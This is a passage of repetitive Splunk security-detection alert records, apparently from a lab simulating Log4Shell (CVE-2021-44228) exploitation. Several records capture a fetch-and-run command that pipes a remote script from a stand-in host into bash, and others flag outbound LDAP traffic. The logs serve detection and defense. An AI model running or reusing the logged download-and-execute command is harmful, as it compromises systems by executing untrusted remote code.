on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it 
with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was 
identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", 
process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", 
parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", 
info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638556, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 12", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="PR.DS", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="DE.CM", annotations._all="T1190", annotations._all="Actions on Objectives", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1059", 
annotations._all="CIS 13", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-19T23:10:20", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed through your perimeter firewall. 
This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642638556, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 12", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="PR.DS", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="DE.CM", annotations._all="T1190", annotations._all="Actions on Objectives", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1059", annotations._all="CIS 13", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", 
latest_time="2022-01-19T23:10:20", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642638515, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", 
